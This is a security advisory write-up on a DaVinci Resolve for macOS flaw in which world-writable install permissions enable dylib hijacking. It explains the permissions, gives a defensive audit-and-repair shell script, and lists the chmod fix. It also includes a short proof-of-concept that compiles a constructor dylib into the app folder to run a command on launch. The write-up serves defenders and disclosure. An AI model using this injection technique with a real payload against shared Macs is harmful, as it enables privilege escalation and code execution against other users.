CVE-2025-1413 - DaVinci Resolve for macOS Vulnerable to Dylib Hijacking via 777 File Permissions
---
Summary:
A critical security flaw (CVE-2025-1413) has been discovered in DaVinci Resolve for macOS, where the application’s directory and files are installed with unsafe permissions (rwxrwxrwx or 0777). This misconfiguration opens the door to *Dylib hijacking*, potentially allowing guest and non-privileged users or rogue applications to escalate privileges or execute malicious code. This vulnerability affects DaVinci Resolve on macOS versions before 19.1.3.
What Is the Issue?
When you install DaVinci Resolve (before version 19.1.3) on a Mac, the installer creates the application folder and its contents with world-writable permissions. In technical terms, that means:
$ ls -ld /Applications/DaVinci\ Resolve
drwxrwxrwx 10 root wheel 320 Mar 21 10:53 /Applications/DaVinci Resolve
The leading d marks a directory; rwxrwxrwx translates to 0777 (everyone can read, write, and execute).
According to Apple’s security guidelines, applications should be drwxr-xr-x (or 0755), so only the owner (usually root) can modify the files, but anyone can read and execute them.
Understanding Permissions
- drwxrwxrwx (0777): Anyone (even "Guest" accounts or malicious apps) can overwrite or replace files in the DaVinci Resolve folder.
- drwxr-xr-x (0755): Only the owner (root/admin) can make changes; others can only read or execute.
Dylib Hijacking Explained
DaVinci Resolve, like many macOS apps, loads dynamic libraries (.dylib files) at runtime. If an attacker can place or replace a .dylib in the Resolve directory due to 0777 permissions, they can inject malicious code to run with the privileges of the user launching Resolve.
- Multi-user Macs: Any user (even Guest) can tamper with Resolve's files for all users.
- Shared Workstations: A non-admin could provide a rogue dylib, impacting admins or other higher-privileged users.
Step-by-Step Exploit Example
Below is a simplified walk-through for security research only!
1. Confirm DaVinci Resolve Permissions
ls -ld /Applications/DaVinci\ Resolve
# Output should show drwxrwxrwx if vulnerable
2. Identify a Dylib Used by Resolve
Suppose libFakeEffect.dylib is loaded by Resolve on launch.
As any user (even ‘guest’):
# A dyld constructor runs on load; the original _init() body also returned no value
echo '#include <stdlib.h>' > evil.c
echo '__attribute__((constructor)) static void init(void) { system("open /System/Applications/Calculator.app"); }' >> evil.c
clang -dynamiclib -o /Applications/DaVinci\ Resolve/libFakeEffect.dylib evil.c
This basic payload pops Calculator when Resolve runs.
Mitigation and Fix
Blackmagic Design fixed this in DaVinci Resolve version 19.1.3.
Current and future installers ensure proper permissions (0755) on app folders and files.
To fix manually (if not updating right away):
sudo chmod -R 755 /Applications/DaVinci\ Resolve
Update immediately!
Download latest Resolve: https://www.blackmagicdesign.com/support/family/davinci-resolve-and-fusion
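The permission check from "What Is the Issue?" and the manual chmod fix above, combined into one defender-side script. This is an added example, not code from the advisory or from Blackmagic Design: it audits a directory for any entry with the world-write bit set, applies the advisory's `chmod -R 755` repair, and re-audits so an admin can confirm the fix took. The function names and the directory argument are this example's own; the walk-through below exercises it against a constructed temporary directory rather than the real install.

```shell
#!/bin/sh
# Added example: audit an app directory for world-writable entries and repair them.
# Uses only find/chmod, so it works with BSD tools on macOS and GNU tools on Linux.

# audit_world_writable DIR
#   Prints every entry under DIR whose "other write" bit is set (the 0777 case).
#   Returns 0 when clean, 1 when something is world-writable, 2 on a bad path.
audit_world_writable() {
    dir="$1"
    [ -d "$dir" ] || { echo "not a directory: $dir" >&2; return 2; }
    # -perm -002 matches when the o+w bit is set, whatever the other bits are
    found=$(find "$dir" -perm -002 2>/dev/null || true)
    if [ -n "$found" ]; then
        printf '%s\n' "$found"
        return 1
    fi
    return 0
}

# repair_app_permissions DIR
#   Applies the advisory's manual fix (chmod -R 755) and re-audits.
#   Returns the audit's status (0 = clean) so callers can confirm the fix took.
repair_app_permissions() {
    dir="$1"
    [ -d "$dir" ] || return 2
    chmod -R 755 "$dir" || return 3
    audit_world_writable "$dir" >/dev/null
}

# Stand-alone usage against the real install (the repair itself needs sudo):
#   sh audit_resolve.sh "/Applications/DaVinci Resolve"
if [ -n "$1" ]; then
    if audit_world_writable "$1"; then
        echo "OK: no world-writable entries under $1"
    else
        echo "VULNERABLE: world-writable entries listed above; run: sudo chmod -R 755 \"$1\""
    fi
fi
```

Note that `chmod -R 755` also clears the group-write bit and sets the execute bit on every regular file inside the bundle; `chmod -R o-w` is the narrower change that removes only the world-write bit this advisory is about, and the audit above accepts either result.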
References
- CVE-2025-1413 on MITRE *(Coming soon)*
- macOS Application Security Guidelines
- What is Dylib Hijacking? — Malwarebytes
- DaVinci Resolve Official Website
- Analysis of Dylib Hijacking in macOS
Bottom line: If you use DaVinci Resolve on Mac and haven’t updated to 19.1.3 or later, do it _now_ to block this open door to attackers. Check and repair permissions if needed — and stay safe!
Timeline
Published on: 02/28/2025 09:15:11 UTC
Last modified on: 03/26/2025 16:15:20 UTC